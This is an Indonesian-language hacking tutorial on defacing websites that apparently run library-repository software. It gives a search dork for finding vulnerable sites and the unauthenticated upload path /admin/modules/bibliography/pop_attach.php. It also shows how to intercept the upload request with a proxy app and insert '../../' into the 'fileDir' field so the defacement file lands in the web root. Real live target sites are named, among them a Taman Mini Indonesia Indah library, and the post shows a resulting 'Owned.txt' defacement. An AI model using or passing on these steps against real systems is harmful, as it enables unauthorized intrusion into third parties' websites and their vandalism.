-
Hai Sobat.
Saya ikal
Disini, saya akan share sesuatu cara deface poc File attachment upload repository
-
Langsung saja, di tutorial kali ini tidak bisa upload shell backdoor yah. Hanya bisa mengupload txt file saja.
Bahan :
- exploit : /admin/modules/bibliography/pop_attach.php
- dork :
intext:"This Software is Released Under GNU GPL License Version 3"
- script deface extensi .txt
Okeh disini saya sudah punya live target.
- Live target :
http://tamanmini.com/perpus/tmii-cendana/
http://tamanmini.com/perpus/tmii-cendana/
Nah kira-kira seperti itu tampilan live target nya :'3. Siapa sih yang ga tau taman mini indonesia indah, main nya kurang jauh wkwk.
Langsung saja masukan exploitnya di belakang url atau path nya yah, lalu jika sudah maka akan muncul seperti ini.
Kalian isi Judul dan upload script deface extensi .txt kalian. Lalu klik Unggah Sekarang.
Dan akses hasilnya di :
https://lon-t.online/path/repository/file.txt
Atau
https://lon-t.online/repository/file.txt
-
Dan saya ingin kasih tau trik agar file tersebut berada di document_root. Caranya?
Bahan :
- sandroproxy
- lightning browser
Bahan bisa kalian download dimana saja.
Pertama kalian unduh atau Download SandroProxy dan buka apl nya. Lalu akan muncul seperti ini :
> Klik Developers mode, capture data ~> klik Done
> buka lightning browser ~> klik titik 3 di pojok kanan atas ~> klik settings ~> klik general settings ~> klik HTTP Proxy ~> klik manual ~> ubah port menjadi 8008 ~> klik ok.
Seperti biasa kalian masukan exploitnya dan isi Judul dan juga pilih script deface extensi .txt kalian lalu klik Unggah sekarang. Jika sudah terupload.
Buka kembali sandroproxy dan klik HTTP lalu cari requestan POST dan klik ~> klik dan tahan ~> lalu klik Manual Requests
> lalu kalian cari kata² ini dan ubah :
------WebKitFormBoundarybqLP0CpAK6I2gxz5Content-Disposition: form-data; name="fileDir"------WebKitFormBoundarybqLP0CpAK6I2gxz5
> ubah menjadi seperti ini :
------WebKitFormBoundarybqLP0CpAK6I2gxz5Content-Disposition: form-data; name="fileDir"../../------WebKitFormBoundarybqLP0CpAK6I2gxz5
> lalu klik segitiga terbalik di pojok kanan atas, dan kembali ke lightning browser kalian. Lalu akses hasilnya
> maka otomatis file akan terupload di document_root.
Cara akses hasilnya :
https://lon-t.online/file.txt
Atau
https://lon-t.online/path/file.txt
Note : jika ingin mencoba remoth path di live target itu tidak bisa
Hasil :
http://tamanmini.com/perpus/tmii-cendana/repository/Owned.txt
Thanks
See u